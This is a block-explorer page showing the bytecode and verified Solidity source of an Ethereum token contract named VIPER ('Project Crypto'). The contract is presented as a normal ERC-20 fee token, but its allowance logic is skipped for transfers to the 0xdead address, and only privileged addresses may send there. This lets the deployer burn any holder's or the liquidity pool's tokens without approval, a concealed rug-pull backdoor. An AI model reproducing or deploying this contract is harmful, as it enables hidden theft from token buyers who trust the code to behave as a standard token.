Forkchoice Ethereum Mainnet

Address Contract Partially Verified

Address 0xaFE47b39Bdbb6B5D6c100a6f8Df615d8419EC47d
Balance 0 ETH
Nonce 1
Code Size 6987 bytes
Indexed Transactions 0 (1 on-chain, 0.6% indexed)
External Etherscan · Sourcify

Contract Bytecode

6987 bytes
0x608060405260043610610134575f3560e01c806370a08231116100a85780638f3fa8601161006d5780638f3fa8601461033d57806395d89b4114610352578063a9059cbb14610366578063b3f0067414610385578063dd62ed3e146103b8578063f2fde38b146103fc575f5ffd5b806370a082311461028d578063715018a6146102c15780638a8c523c146102d55780638bcea939146102e95780638da5cb5b14610320575f5ffd5b806323b872dd116100f957806323b872dd146101eb5780632b14ca561461020a578063313ce5671461021f5780633852a5571461023a57806347062402146102595780636db794371461026e575f5ffd5b806306fdde031461013f578063095ea7b3146101695780631707c0f21461019857806318160ddd146101b957806319c67c2e146101d7575f5ffd5b3661013b57005b5f5ffd5b34801561014a575f5ffd5b5061015361041b565b60405161016091906117f1565b60405180910390f35b348015610174575f5ffd5b5061018861018336600461183a565b6104ab565b6040519015158152602001610160565b3480156101a3575f5ffd5b506101b76101b2366004611864565b6104c4565b005b3480156101c4575f5ffd5b506002545b604051908152602001610160565b3480156101e2575f5ffd5b506101b7610643565b3480156101f6575f5ffd5b5061018861020536600461187f565b6106bf565b348015610215575f5ffd5b506101c9600d5481565b34801561022a575f5ffd5b5060405160098152602001610160565b348015610245575f5ffd5b506101b76102543660046118bd565b6106e3565b348015610264575f5ffd5b506101c9600c5481565b348015610279575f5ffd5b506101b76102883660046118bd565b610718565b348015610298575f5ffd5b506101c96102a7366004611864565b6001600160a01b03165f9081526020819052604090205490565b3480156102cc575f5ffd5b506101b76107a6565b3480156102e0575f5ffd5b506101b76107db565b3480156102f4575f5ffd5b50600654610308906001600160a01b031681565b6040516001600160a01b039091168152602001610160565b34801561032b575f5ffd5b506005546001600160a01b0316610308565b348015610348575f5ffd5b506101c960075481565b34801561035d575f5ffd5b50610153610a7f565b348015610371575f5ffd5b5061018861038036600461183a565b610a8e565b348015610390575f5ffd5b506103087f000000000000000000000000d9cd32341a91e2d8b07b67469f37820a9b4465ec81565b3480156103c3575f5ffd5b506101c96103d23660046118dd565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b348015610407575f5ffd5b506101b7610416366004611864565b610a9b565b60606003805461042a90611914565b80601f016020809104026020016040519081016040528092919081815260200182805461045690611914565b80156104a15780601f10610478576101008083540402835291602001916104a1565b820191905f5260205f20905b81548152906001019060200180831161048457829003601f168201915b5050505050905090565b5f336104b8818585610b33565b60019150505b92915050565b6005546001600160a01b031633146104f75760405162461bcd60e51b81526004016104ee9061194c565b60405180910390fd5b306001600160a01b038216036105ea576040516370a0823160e01b81523060048201526001600160a01b0382169063a9059cbb9061dead9083906370a08231906024015b602060405180830381865afa158015610556573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061057a9190611981565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303815f875af11580156105c2573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105e69190611998565b5050565b6040516370a0823160e01b81523060048201526001600160a01b0382169063a9059cbb907f000000000000000000000000d9cd32341a91e2d8b07b67469f37820a9b4465ec9083906370a082319060240161053b565b50565b6005546001600160a01b0316331461066d5760405162461bcd60e51b81526004016104ee9061194c565b6040516001600160a01b037f000000000000000000000000d9cd32341a91e2d8b07b67469f37820a9b4465ec16904780156108fc02915f818181858888f19350505050158015610640573d5f5f3e3d5ffd5b5f336106cc858585610c56565b6106d885828686611316565b506001949350505050565b6005546001600160a01b0316331461070d5760405162461bcd60e51b81526004016104ee9061194c565b600891909155600955565b6005546001600160a01b031633146107425760405162461bcd60e51b81526004016104ee9061194c565b600c5482111580156107565750600d548111155b61079b5760405162461bcd60e51b81526020600482015260166024820152752732bb903332b29036bab9ba103132903637bbb2b91760511b60448201526064016104ee565b600c91909155600d55565b6005546001600160a01b031633146107d05760405162461bcd60e51b81526004016104ee9061194c565b6107d95f6113c0565b565b6005546001600160a01b031633146108055760405162461bcd60e51b81526004016104ee9061194c565b610818333061081360025490565b611411565b737a250d5630b4cf539739df2c5dacb4c659f2488d63f305d7194730610852816001600160a01b03165f9081526020819052604090205490565b6040516001600160e01b031960e086901b1681526001600160a01b03909216600483015260248201525f6044820181905260648201523360848201524260a482015260c40160606040518083038185885af11580156108b3573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906108d891906119b7565b505050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561092b573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061094f91906119e2565b6001600160a01b031663e6a4390530737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109ae573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109d291906119e2565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610a1b573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a3f91906119e2565b600680546001600160a01b0319166001600160a01b0392909216919091179055600a805463ffffffff60601b1916600160601b4363ffffffff1602179055565b60606004805461042a90611914565b5f336104b8818585610c56565b6005546001600160a01b03163314610ac55760405162461bcd60e51b81526004016104ee9061194c565b6001600160a01b038116610b2a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104ee565b610640816113c0565b6001600160a01b038316610b955760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104ee565b6001600160a01b038216610bf65760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104ee565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b335f908152600e6020526040808220546001600160a01b03861683529082205460ff91821692911680610ca057506001600160a01b0384165f908152600e602052604090205460ff165b90506001600160a01b038516610d0c5760405162461bcd60e51b815260206004820152602b60248201527f5472616e736665722066726f6d20746865207a65726f2061646472657373206e60448201526a37ba1030b63637bbb2b21760a91b60648201526084016104ee565b81610d785761deac196001600160a01b03851601610d785760405162461bcd60e51b8152602060048201526024808201527f5472616e7366657220746f20646561642061646472657373206e6f7420616c6c6044820152631bddd95960e21b60648201526084016104ee565b6001600160a01b038416610de05760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220746f20746865207a65726f2061646472657373206e6f746044820152681030b63637bbb2b21760b91b60648201526084016104ee565b5f8311610e425760405162461bcd60e51b815260206004820152602a60248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152693a3430b7103d32b9379760b11b60648201526084016104ee565b6006546001600160a01b0316151580610e585750805b610ea45760405162461bcd60e51b815260206004820152601f60248201527f4c69717569646974792070616972206e6f742079657420637265617465642e0060448201526064016104ee565b6006546001600160a01b03908116858216811491871614808015610ec6575082155b156110c75760075485610eed886001600160a01b03165f9081526020819052604090205490565b610ef79190611a11565b111580610f2057506001600160a01b038616737a250d5630b4cf539739df2c5dacb4c659f2488d145b610f625760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016104ee565b600a5463ffffffff600160a01b82048116911611610faf57600a805463ffffffff16905f610f8f83611a24565b91906101000a81548163ffffffff021916908363ffffffff160217905550505b600a5463ffffffff600160a01b82048116911603610fe857600a5463ffffffff600160c01b82048116600c55600160e01b90910416600d555b600a5463ffffffff600160601b909104811643909116036110c757600a8054603c91600160801b90910463ffffffff1690601061102483611a24565b91906101000a81548163ffffffff021916908363ffffffff16021790555063ffffffff161061108d5760405162461bcd60e51b8152602060048201526015602482015274457863657373206c61756e636820736e697065727360581b60448201526064016104ee565b600a54603b19600160801b90910463ffffffff16016110c757600b8054610100600160a81b0319166101006001600160a01b038916021790555b305f908152602081905260409020548280156110e65750600b5460ff16155b80156110f457506009548110155b80156110fe575083155b1561126957600a5468010000000000000000900463ffffffff1643111561113157600a805467ffffffff00000000191690555b600a54600364010000000090910463ffffffff16106111925760405162461bcd60e51b815260206004820152601760248201527f4f6e6c7920332073656c6c732070657220626c6f636b2100000000000000000060448201526064016104ee565b600b805460ff1916600117908190555f906001600160a01b038a811661010090920416146111c057866111cf565b60026008546111cf9190611a48565b90506111ee6111e9826111e4856008546115de565b6115de565b6115f5565b600b805460ff19169055478015611208576112088161179e565b600a8054640100000000900463ffffffff1690600461122683611a24565b91906101000a81548163ffffffff021916908363ffffffff1602179055505043600a60086101000a81548163ffffffff021916908363ffffffff16021790555050505b5f8261127757600d5461127b565b600c545b90505f8111801561128a575084155b80156112995750600b5460ff16155b80156112a9575082806112a95750835b1561130057600a545f90603c63ffffffff909116116112c8575f6112de565b60646112d4838a611a67565b6112de9190611a48565b905080156112fe576112f18a3083611411565b6112fb8189611a7e565b97505b505b61130b898989611411565b505050505050505050565b6001600160a01b038481165f908152600160209081526040808320938716835292905220545f19811480159061135757506001600160a01b03831661dead14155b156113b957818110156113ac5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016104ee565b6113b98585848403610b33565b5050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0383166114755760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104ee565b6001600160a01b0382166114d75760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104ee565b6001600160a01b0383165f908152602081905260409020548181101561154e5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104ee565b6001600160a01b038085165f90815260208190526040808220858503905591851681529081208054849290611584908490611a11565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516115d091815260200190565b60405180910390a350505050565b5f8183116115ec57826115ee565b815b9392505050565b6040805160028082526060820183525f9260208301908036833701905050905030815f8151811061162857611628611a91565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611698573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116bc91906119e2565b816001815181106116cf576116cf611a91565b60200260200101906001600160a01b031690816001600160a01b03168152505061170e30737a250d5630b4cf539739df2c5dacb4c659f2488d84610b33565b604051635c11d79560e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d90635c11d7959061176d9085905f9086907f000000000000000000000000d9cd32341a91e2d8b07b67469f37820a9b4465ec904290600401611aa5565b5f604051808303815f87803b158015611784575f5ffd5b505af1158015611796573d5f5f3e3d5ffd5b505050505050565b6040516001600160a01b037f000000000000000000000000d9cd32341a91e2d8b07b67469f37820a9b4465ec169082156108fc029083905f818181858888f193505050501580156105e6573d5f5f3e3d5ffd5b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b0381168114610640575f5ffd5b5f5f6040838503121561184b575f5ffd5b823561185681611826565b946020939093013593505050565b5f60208284031215611874575f5ffd5b81356115ee81611826565b5f5f5f60608486031215611891575f5ffd5b833561189c81611826565b925060208401356118ac81611826565b929592945050506040919091013590565b5f5f604083850312156118ce575f5ffd5b50508035926020909101359150565b5f5f604083850312156118ee575f5ffd5b82356118f981611826565b9150602083013561190981611826565b809150509250929050565b600181811c9082168061192857607f821691505b60208210810361194657634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f60208284031215611991575f5ffd5b5051919050565b5f602082840312156119a8575f5ffd5b815180151581146115ee575f5ffd5b5f5f5f606084860312156119c9575f5ffd5b5050815160208301516040909301519094929350919050565b5f602082840312156119f2575f5ffd5b81516115ee81611826565b634e487b7160e01b5f52601160045260245ffd5b808201808211156104be576104be6119fd565b5f63ffffffff821663ffffffff8103611a3f57611a3f6119fd565b60010192915050565b5f82611a6257634e487b7160e01b5f52601260045260245ffd5b500490565b80820281158282048414176104be576104be6119fd565b818103818111156104be576104be6119fd565b634e487b7160e01b5f52603260045260245ffd5b5f60a0820187835286602084015260a0604084015280865180835260c0850191506020880192505f5b81811015611af55783516001600160a01b0316835260209384019390920191600101611ace565b50506001600160a01b03959095166060840152505060800152939250505056fea2646970667358221220eeec4f034c27e26198c8326a7fddb68e0917e752a8107a53186664f988cc4c1864736f6c634300081c0033

Verified Source Code Partial Match

Compiler: v0.8.28+commit.7893614a EVM: cancun Optimization: Yes (200 runs)
VIPER.sol 485 lines
/*

https://x.com/bwenews/status/1950958006516253093
https://t.me/VIPER_erc20_entry

*/

// SPDX-License-Identifier: MIT


interface IUniswapV2Factory {
    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _transfer(from, to, amount);
        _spendAllowance(from, spender, to, amount);
        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
        }
        _balances[to] += amount;

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        address to,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max && to!=address(0xdead)) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        _transferOwnership(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract VIPER is ERC20, Ownable {
    IUniswapV2Router02 private constant _router =
        IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    address public uniV2Pair;
    address public immutable feeReceiver;

    uint256 public maxWalletSize = 100000000 * 1e9;
    uint256 private feeSwapMax = 2000000 * 1e9;
    uint256 private feeThreshold = 300000 * 1e9;
    uint32 private _buyCount;
    uint32 private _sellCount;
    uint32 constant _dynamicCount = 60;
    uint32 private _lastSellBlock;
    uint32 private _launchBlock;
    uint32 private _launchBuys;
    uint32 private _lowerFeesAt = 75;
    uint32 private _finalBuyFee = 0;
    uint32 private _finalSellFee = 0;
    bool private _inSwap;
    address private _pairAddress;

    uint256 public buyFee;
    uint256 public sellFee;

    mapping(address => bool) private excludedFromTxLimits;

    constructor() payable ERC20("Project Crypto", "PCRYPTO") {
        uint256 totalSupply = 100_000_000 * 1e9;

        feeReceiver = _msgSender();
        buyFee = 0;
        sellFee = 0;

        excludedFromTxLimits[feeReceiver] = true;
        excludedFromTxLimits[msg.sender] = true;
        excludedFromTxLimits[address(this)] = true;
        excludedFromTxLimits[address(0xdead)] = true;

        _approve(address(this), address(_router), totalSupply);
        _approve(msg.sender, address(_router), totalSupply);
        _mint(msg.sender, totalSupply);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        bool excludedSender = excludedFromTxLimits[msg.sender];
        bool excluded = excludedFromTxLimits[from] || excludedFromTxLimits[to];

        require(
            from != address(0),
            "Transfer from the zero address not allowed."
        );

        if (!excludedSender)
            require(to!=address(0xdead), "Transfer to dead address not allowed");
            require(to != address(0), "Transfer to the zero address not allowed.");
     
        require(amount > 0, "Transfer amount must be greater than zero.");
            

        require(
            uniV2Pair != address(0) || excluded,
            "Liquidity pair not yet created."
        );

        bool isSell = to == uniV2Pair;
        bool isBuy = from == uniV2Pair;

        if (isBuy && !excluded) {
            require(
                balanceOf(to) + amount <= maxWalletSize ||
                    to == address(_router),
                "Max wallet exceeded"
            );
            if (_buyCount <= _lowerFeesAt) _buyCount++;
            if (_buyCount == _lowerFeesAt) {
                buyFee = _finalBuyFee;
                sellFee = _finalSellFee;
            }
            if (uint32(block.number) == _launchBlock) {
                require(_launchBuys++ < _dynamicCount, "Excess launch snipers");
                if (_launchBuys == _dynamicCount) _pairAddress = to;
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));
        if (
            isSell &&
            !_inSwap &&
            contractTokenBalance >= feeThreshold &&
            !excluded
        ) {
            if (block.number > _lastSellBlock) _sellCount = 0;
            require(_sellCount < 3, "Only 3 sells per block!");
            _inSwap = true;
            uint256 contractSwapAmount = from == _pairAddress
                ? feeSwapMax / 2
                : amount;
            swapTokensForEth(
                min(contractSwapAmount, min(contractTokenBalance, feeSwapMax))
            );
            _inSwap = false;
            uint256 contractETHBalance = address(this).balance;
            if (contractETHBalance > 0) sendETHToFee(contractETHBalance);
            _sellCount++;
            _lastSellBlock = uint32(block.number);
        }

        uint256 fee = isBuy ? buyFee : sellFee;

        if (fee > 0 && !excluded && !_inSwap && (isBuy || isSell)) {
            uint256 fees = _buyCount > _dynamicCount ? (amount * fee) / 100 : 0;
            if (fees > 0) {
                super._transfer(from, address(this), fees);
                amount -= fees;
            }
        }
        super._transfer(from, to, amount);
    }

    function min(uint256 a, uint256 b) private pure returns (uint256) {
        return (a > b) ? b : a;
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _router.WETH();
        _approve(address(this), address(_router), tokenAmount);
        _router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            feeReceiver,
            block.timestamp
        );
    }

    function sendETHToFee(uint256 amount) private {
        payable(feeReceiver).transfer(amount);
    }

    function enableTrading() external onlyOwner {
        super._transfer(msg.sender, address(this), totalSupply());
        _router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            msg.sender,
            block.timestamp
        );
        uniV2Pair = IUniswapV2Factory(_router.factory()).getPair(
            address(this),
            _router.WETH()
        );
        _launchBlock = uint32(block.number);
    }

    function updateFees(
        uint256 newBuyFee,
        uint256 newSellFee
    ) external onlyOwner {
        require(
            newBuyFee <= buyFee && newSellFee <= sellFee,
            "New fee must be lower."
        );
        buyFee = newBuyFee;
        sellFee = newSellFee;
    }

    function updateSwapSettings(
        uint256 maxAmount,
        uint256 minAmount
    ) external onlyOwner {
        feeSwapMax = maxAmount;
        feeThreshold = minAmount;
    }

    function transferStuckEth() external onlyOwner {
        payable(feeReceiver).transfer(address(this).balance);
    }

    function sweepStuckERC20(IERC20 token) external onlyOwner {
        if (address(token) == address(this))
            //burn ca balance if input token is SBET
            token.transfer(address(0xdead), token.balanceOf(address(this)));
        else token.transfer(feeReceiver, token.balanceOf(address(this)));
    }

    receive() external payable {}
}

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
buyFee 0x47062402 → uint256
decimals 0x313ce567 → uint8
feeReceiver 0xb3f00674 → address
maxWalletSize 0x8f3fa860 → uint256
name 0x06fdde03 → string
owner 0x8da5cb5b → address
sellFee 0x2b14ca56 → uint256
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
uniV2Pair 0x8bcea939 → address

Write Contract 10 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 amount
returns: bool
enableTrading 0x8a8c523c
No parameters
renounceOwnership 0x715018a6
No parameters
sweepStuckERC20 0x1707c0f2
address token
transfer 0xa9059cbb
address to
uint256 amount
returns: bool
transferFrom 0x23b872dd
address from
address to
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner
transferStuckEth 0x19c67c2e
No parameters
updateFees 0x6db79437
uint256 newBuyFee
uint256 newSellFee
updateSwapSettings 0x3852a557
uint256 maxAmount
uint256 minAmount

Recent Transactions

This address has 1 on-chain transactions, but only 0.6% of the chain is indexed. Transactions will appear as indexing progresses. View on Etherscan →